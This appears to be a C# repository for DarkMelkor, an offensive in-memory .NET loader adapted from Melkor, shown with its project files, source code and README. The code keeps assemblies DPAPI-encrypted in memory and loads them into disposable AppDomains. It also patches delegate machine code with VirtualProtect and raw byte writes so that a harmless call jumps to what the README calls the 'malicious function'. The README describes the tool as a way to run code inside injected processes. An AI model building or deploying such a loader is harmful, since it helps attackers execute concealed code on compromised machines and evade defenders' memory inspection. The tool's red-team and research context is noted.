├── DarkMelkor ├── DarkMelkor │ ├── DarkMelkor.sln │ └── DarkMelkor │ │ ├── App.config │ │ ├── DarkMelkor.csproj │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ └── hDarkMelkor.cs └── demoModule │ ├── demoModule.sln │ └── demoModule │ ├── App.config │ ├── Program.cs │ ├── Properties │ └── AssemblyInfo.cs │ └── demoModule.csproj └── README.md /DarkMelkor/DarkMelkor/DarkMelkor.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31229.75 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarkMelkor", "DarkMelkor\DarkMelkor.csproj", "{ECF2FFE4-1744-4745-8693-5790D66BB1B8}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {6EF84481-D7BF-497F-B4C6-F691D7ED195A} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 
-------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/DarkMelkor.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8} 8 | Exe 9 | DarkMelkor 10 | DarkMelkor 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | 4 | namespace DarkMelkor 5 | { 6 | class Program 7 | { 8 | public static void runTest() 9 | { 10 | // Encrypt module 11 | //============== 12 | Console.WriteLine("[>] Reading assembly as Byte[]"); 13 | Byte[] bMod = File.ReadAllBytes(@"C:\Users\tmayllart\Downloads\DarkMelkor\demoModule\demoModule\bin\Debug\demoModule.exe");//change it wth the path of the compiled demoModule 14 | Console.WriteLine("[>] DPAPI CryptProtectData -> assembly[]"); 15 | DarkMelkor.DPAPI_MODULE dpMod = DarkMelkor.dpapiEncryptModule(bMod, "Melkor", 0); 16 | if (dpMod.pMod != IntPtr.Zero) 17 | { 18 | Console.WriteLine(" |_ Success"); 19 | Console.WriteLine(" |_ pCrypto : 0x" + String.Format("{0:X}", (dpMod.pMod).ToInt64())); 20 | Console.WriteLine(" |_ iSize : " + dpMod.iModSize); 21 | bMod = null; 22 | } else 23 | { 24 | Console.WriteLine("\n[!] Failed to DPAPI encrypt module.."); 25 | return; 26 | } 27 | 28 | Console.WriteLine("\n[?] 
Press enter to continue.."); 29 | 30 | // Create AppDomain & load module 31 | //============== 32 | Console.WriteLine("[>] DPAPI CryptUnprotectData -> assembly[] copy"); 33 | DarkMelkor.DPAPI_MODULE oMod = DarkMelkor.dpapiDecryptModule(dpMod); 34 | if (oMod.iModSize != 0) 35 | { 36 | Console.WriteLine(" |_ Success"); 37 | } else 38 | { 39 | Console.WriteLine("\n[!] Failed to DPAPI decrypt module.."); 40 | return; 41 | } 42 | Console.WriteLine("[>] Create new AppDomain and invoke module through proxy.."); 43 | AppDomain oAngband = null; 44 | try 45 | { 46 | oAngband = DarkMelkor.loadAppDomainModule("dothething", "Angband", oMod.bMod); 47 | } 48 | catch (Exception ex) 49 | { 50 | } 51 | 52 | Console.WriteLine("\n[?] Press enter to continue.."); 53 | 54 | // Remove Appdomain and free CryptUnprotectData 55 | //============== 56 | Console.WriteLine("[>] Unloading AppDomain"); 57 | DarkMelkor.unloadAppDomain(oAngband); 58 | Console.WriteLine("[>] Freeing CryptUnprotectData"); 59 | DarkMelkor.freeMod(oMod); 60 | 61 | Console.WriteLine("\n[?] Press enter to exit.."); 62 | } 63 | 64 | static void Main(string[] args) 65 | { 66 | runTest(); 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 
8 | [assembly: AssemblyTitle("Melkor")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Melkor")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("ecf2ffe4-1744-4745-8693-5790d66bb1b8")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/hDarkMelkor.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Reflection; 4 | using System.Runtime.CompilerServices; 5 | using System.Runtime.InteropServices; 6 | 7 | namespace DarkMelkor 8 | { 9 | class DarkMelkor 10 | { 11 | [DllImport("kernel32")] 12 | static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 13 | 14 | // API 15 | //====================== 16 | [DllImport("ntdll.dll")] 17 | public static extern UInt32 NtFreeVirtualMemory( 18 | IntPtr ProcessHandle, 19 | ref IntPtr BaseAddress, 20 | ref IntPtr 
RegionSize, 21 | AllocationType FreeType); 22 | 23 | [DllImport("ntdll.dll")] 24 | public static extern void RtlZeroMemory( 25 | IntPtr Destination, 26 | int length); 27 | 28 | [DllImport("kernel32.dll")] 29 | public static extern IntPtr LocalFree( 30 | IntPtr hMem); 31 | 32 | [DllImport("crypt32.dll", CharSet = CharSet.Auto)] 33 | public static extern bool CryptProtectData( 34 | ref DATA_BLOB pPlainText, 35 | string szDescription, 36 | ref DATA_BLOB pEntropy, 37 | IntPtr pReserved, 38 | IntPtr pPrompt, 39 | int dwFlags, 40 | ref DATA_BLOB pCipherText); 41 | 42 | [DllImport("crypt32.dll", CharSet = CharSet.Auto)] 43 | public static extern bool CryptUnprotectData( 44 | ref DATA_BLOB pCipherText, 45 | ref string pszDescription, 46 | ref DATA_BLOB pEntropy, 47 | IntPtr pReserved, 48 | IntPtr pPrompt, 49 | int dwFlags, 50 | ref DATA_BLOB pPlainText); 51 | 52 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 53 | internal struct DATA_BLOB 54 | { 55 | public int cbData; 56 | public IntPtr pbData; 57 | } 58 | 59 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 60 | internal struct CRYPTPROTECT_PROMPTSTRUCT 61 | { 62 | public int cbSize; 63 | public int dwPromptFlags; 64 | public IntPtr hwndApp; 65 | public string szPrompt; 66 | } 67 | 68 | [StructLayout(LayoutKind.Sequential)] 69 | internal struct DPAPI_MODULE 70 | { 71 | public String sModName; 72 | public int iModVersion; 73 | public int iModSize; 74 | public IntPtr pMod; 75 | public Byte[] bMod; 76 | } 77 | 78 | [Flags] 79 | public enum AllocationType : uint 80 | { 81 | Commit = 0x1000, 82 | Reserve = 0x2000, 83 | Decommit = 0x4000, 84 | Release = 0x8000, 85 | Reset = 0x80000, 86 | Physical = 0x400000, 87 | TopDown = 0x100000, 88 | WriteWatch = 0x200000, 89 | ResetUndo = 0x1000000, 90 | LargePages = 0x20000000 91 | } 92 | 93 | // Globals 94 | //====================== 95 | public static Byte[] bEntropy = { 0x90, 0x91, 0x92, 0x93 }; // Add entropy to the crypto 96 | public static int 
CRYPTPROTECT_LOCAL_MACHINE = 0x4; 97 | public static Object CryptLock = new Object(); 98 | 99 | public static AppDomain loadAppDomainModule(String sMethod, String sAppDomain, Byte[] bMod) 100 | { 101 | var bytes = bMod; 102 | string pathToDll = Assembly.GetExecutingAssembly().CodeBase; 103 | AppDomainSetup domainSetup = new AppDomainSetup { PrivateBinPath = pathToDll }; 104 | AppDomain isolationDomain = AppDomain.CreateDomain(Guid.NewGuid().ToString()); 105 | isolationDomain.SetData("str", "[!] Before Loader"); 106 | Console.WriteLine(isolationDomain.GetData("str")); 107 | bool default_domain = AppDomain.CurrentDomain.IsDefaultAppDomain(); 108 | try 109 | { 110 | isolationDomain.Load(bMod); 111 | } 112 | catch{ } 113 | var Sleeve = new CrossAppDomainDelegate(Console.Beep); 114 | var Ace = new CrossAppDomainDelegate(ActivateLoader); 115 | 116 | RuntimeHelpers.PrepareDelegate(Sleeve); 117 | RuntimeHelpers.PrepareDelegate(Ace); 118 | 119 | var flags = BindingFlags.Instance | BindingFlags.NonPublic; 120 | var codeSleeve = (IntPtr)Sleeve.GetType().GetField("_methodPtrAux", flags).GetValue(Sleeve); 121 | var codeAce = (IntPtr)Ace.GetType().GetField("_methodPtrAux", flags).GetValue(Ace); 122 | 123 | int[] patch = new int[3]; 124 | 125 | 126 | //Uncomment this if you are compiling for .NET 4.5 127 | /* 128 | if (default_domain) 129 | { 130 | patch[0] = 8; 131 | patch[1] = 9; 132 | patch[2] = 10; 133 | } 134 | else 135 | {*/ 136 | patch[0] = 10; 137 | patch[1] = 11; 138 | patch[2] = 12; 139 | //} 140 | 141 | uint oldprotect = 0; 142 | VirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), 0x4, out oldprotect); 143 | Marshal.WriteByte(codeSleeve, 0x48); 144 | Marshal.WriteByte(IntPtr.Add(codeSleeve,1),0xb8); 145 | Marshal.WriteIntPtr(IntPtr.Add(codeSleeve, 2), codeAce); 146 | Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[0]), 0xff); 147 | Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[1]), 0xe0); 148 | VirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), oldprotect, out 
oldprotect); 149 | 150 | try 151 | { 152 | isolationDomain.DoCallBack(Sleeve); 153 | Console.WriteLine("[!] " + isolationDomain.GetData("str")); 154 | }catch(Exception ex) 155 | { } 156 | string str = isolationDomain.GetData("str") as string; 157 | return isolationDomain; 158 | } 159 | 160 | static void ActivateLoader() 161 | { 162 | string str = AppDomain.CurrentDomain.GetData("str") as string; 163 | string[] args = { str, "Loader Active" }; 164 | string output = ""; 165 | foreach (var asm in AppDomain.CurrentDomain.GetAssemblies()) 166 | { 167 | if (!asm.FullName.Contains("mscor")) 168 | { 169 | TextWriter realStdOut = Console.Out; 170 | TextWriter realStdErr = Console.Error; 171 | TextWriter stdOutWriter = new StringWriter(); 172 | TextWriter stdErrWriter = new StringWriter(); 173 | Console.SetOut(stdOutWriter); 174 | Console.SetError(stdErrWriter); 175 | var result = asm.EntryPoint.Invoke(null, new object[] { args }); 176 | 177 | Console.Out.Flush(); 178 | Console.Error.Flush(); 179 | Console.SetOut(realStdOut); 180 | Console.SetError(realStdErr); 181 | 182 | output = stdOutWriter.ToString(); 183 | output += stdErrWriter.ToString(); 184 | } 185 | } 186 | AppDomain.CurrentDomain.SetData("str",output); 187 | 188 | } 189 | 190 | public static void unloadAppDomain(AppDomain oDomain) 191 | { 192 | AppDomain.Unload(oDomain); 193 | } 194 | 195 | public static DATA_BLOB makeBlob(Byte[] bData) 196 | { 197 | DATA_BLOB oBlob = new DATA_BLOB(); 198 | 199 | oBlob.pbData = Marshal.AllocHGlobal(bData.Length); 200 | oBlob.cbData = bData.Length; 201 | RtlZeroMemory(oBlob.pbData, bData.Length); 202 | Marshal.Copy(bData, 0, oBlob.pbData, bData.Length); 203 | 204 | return oBlob; 205 | } 206 | 207 | public static void freeMod(DPAPI_MODULE oMod) 208 | { 209 | //IntPtr piLen = (IntPtr)oMod.iModSize; 210 | //NtFreeVirtualMemory((IntPtr)(-1), ref oMod.pMod, ref piLen, AllocationType.Release); 211 | LocalFree(oMod.pMod); 212 | } 213 | 214 | public static DPAPI_MODULE 
dpapiEncryptModule(Byte[] bMod, String sModName, Int32 iModVersion = 0) 215 | { 216 | DPAPI_MODULE dpMod = new DPAPI_MODULE(); 217 | 218 | DATA_BLOB oPlainText = makeBlob(bMod); 219 | DATA_BLOB oCipherText = new DATA_BLOB(); 220 | DATA_BLOB oEntropy = makeBlob(bEntropy); 221 | 222 | Boolean bStatus = CryptProtectData(ref oPlainText, sModName, ref oEntropy, IntPtr.Zero, IntPtr.Zero, CRYPTPROTECT_LOCAL_MACHINE, ref oCipherText); 223 | if (bStatus) 224 | { 225 | dpMod.sModName = sModName; 226 | dpMod.iModVersion = iModVersion; 227 | dpMod.iModSize = oCipherText.cbData; 228 | dpMod.pMod = oCipherText.pbData; 229 | } 230 | 231 | return dpMod; 232 | } 233 | 234 | public static DPAPI_MODULE dpapiDecryptModule(DPAPI_MODULE oEncMod) 235 | { 236 | DPAPI_MODULE oMod = new DPAPI_MODULE(); 237 | 238 | Byte[] bEncrypted = new Byte[oEncMod.iModSize]; 239 | Marshal.Copy(oEncMod.pMod, bEncrypted, 0, oEncMod.iModSize); 240 | 241 | DATA_BLOB oPlainText = new DATA_BLOB(); 242 | DATA_BLOB oCipherText = makeBlob(bEncrypted); 243 | DATA_BLOB oEntropy = makeBlob(bEntropy); 244 | 245 | String sDescription = String.Empty; 246 | Boolean bStatus = CryptUnprotectData(ref oCipherText, ref sDescription, ref oEntropy, IntPtr.Zero, IntPtr.Zero, 0, ref oPlainText); 247 | if (bStatus) 248 | { 249 | oMod.pMod = oPlainText.pbData; 250 | oMod.bMod = new Byte[oPlainText.cbData]; 251 | Marshal.Copy(oPlainText.pbData, oMod.bMod, 0, oPlainText.cbData); 252 | oMod.iModSize = oPlainText.cbData; 253 | oMod.iModVersion = oEncMod.iModVersion; 254 | } 255 | 256 | return oMod; 257 | } 258 | } 259 | } 260 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31229.75 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | 
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "demoModule", "demoModule\demoModule.csproj", "{0A621F4C-8082-4C30-B131-BA2C98DB0533}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {0A621F4C-8082-4C30-B131-BA2C98DB0533}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {0A621F4C-8082-4C30-B131-BA2C98DB0533}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {0A621F4C-8082-4C30-B131-BA2C98DB0533}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {0A621F4C-8082-4C30-B131-BA2C98DB0533}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {63EC8396-3687-44B2-9719-4C1CCBF3DD95} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows.Forms; 7 | using System.IO; 8 | 9 | namespace demoModule 10 | { 11 | class Program 12 | { 13 | public static void doTheThing(string[] args) 14 | { 15 | Console.WriteLine("After Loader"); 16 | } 17 | 18 | static void Main(string[] args) 19 | { 20 | doTheThing(args); 21 | } 22 | } 23 | } 24 | -------------------------------------------------------------------------------- 
/DarkMelkor/demoModule/demoModule/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("demoModule")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("demoModule")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("0a621f4c-8082-4c30-b131-ba2c98db0533")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule/demoModule.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {0A621F4C-8082-4C30-B131-BA2C98DB0533} 8 | Exe 9 | demoModule 10 | demoModule 11 | v4.5 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DarkMelkor 2 | 3 | DarkMelkor is a modified version of Melkor, from @b33f (FuzzySecurity): https://github.com/FuzzySecurity/Sharp-Suite. 4 | Melkor was originally released as a tool able to load .NET assemblies in disposable AppDomains, keeping them encrypted in memory while they are not being invoked. 
5 | This came up as an alternative to fork&run tasks, since it would be possible to load, invoke and discard the AppDomains in the same process, instead of loading the CLR in a sacrificial process and waiting for it to finish execution. 6 | Unfortunately, the original project was not able to reference the loaded assembly in the disposable AppDomain when it is loaded in an injected process, because the call is made from a “no context” assembly. 7 | 8 | While searching for a way around this problem, this article: https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes from Bryan Alexander and Josh Stone offered an interesting solution. It is possible to create two CrossAppDomainDelegates: one of them referencing a function that can be resolved by our "no context" assembly (basically anything in the mscorlib) and the other being our malicious function. After that we can patch the initial bytes of the first function with the address of the malicious one, so that calling the non-malicious one ends up jumping to the address of the second function. 9 | 10 | Credit goes to these folks: @b33f, Bryan Alexander and Josh Stone. I've just assembled these ideas with small modifications. 11 | --------------------------------------------------------------------------------